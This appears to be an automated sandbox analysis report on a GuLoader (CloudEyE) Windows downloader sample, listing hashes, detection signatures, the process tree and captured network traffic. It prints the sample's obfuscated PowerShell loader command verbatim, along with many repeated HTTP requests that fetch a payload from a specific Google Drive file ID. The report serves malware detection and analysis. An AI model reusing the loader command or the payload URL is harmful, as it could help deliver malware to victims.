Windows Analysis Report
TVPfW4WUdj.exe

Overview

General Information

Sample name: TVPfW4WUdj.exe (renamed because original name is a hash value)
Original sample name: efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377.exe
Analysis ID: 1588326
MD5: 5dec892fcaf6f21ac6780c69f631f82c
SHA1: 851ae1f87751cbed45a523fc340771f998e62db1
SHA256: efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377
Tags: exe, GuLoader, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • TVPfW4WUdj.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\TVPfW4WUdj.exe" MD5: 5DEC892FCAF6F21AC6780C69F631F82C)
    • powershell.exe (PID: 5268 cmdline: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TVPfW4WUdj.exe", ParentImage: C:\Users\user\Desktop\TVPfW4WUdj.exe, ParentProcessId: 1992, ParentProcessName: TVPfW4WUdj.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , ProcessId: 5268, ProcessName: powershell.exe
      Source: Network Connection, Author: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2160, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TVPfW4WUdj.exe", ParentImage: C:\Users\user\Desktop\TVPfW4WUdj.exe, ParentProcessId: 1992, ParentProcessName: TVPfW4WUdj.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)" , ProcessId: 5268, ProcessName: powershell.exe
      Timestamp: 2025-01-11T00:01:51.246674+0100, SID: 2803270, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.2.8, Source Port: 49708, Destination IP: 216.58.206.46, Destination Port: 443, Protocol: TCP

      AV Detection

      Source: C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe, ReversingLabs: Detection: 55%
      Source: TVPfW4WUdj.exe, Virustotal: Detection: 70%
      Source: TVPfW4WUdj.exe, ReversingLabs: Detection: 55%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
      Source: TVPfW4WUdj.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: TVPfW4WUdj.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: qm.Core.pdbk source: powershell.exe, 00000002.00000002.1779505501.0000000008B12000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe, Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49708 -> 216.58.206.46:443
      Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected:
        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
        Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global traffic, HTTP traffic detected:
        GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
        Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
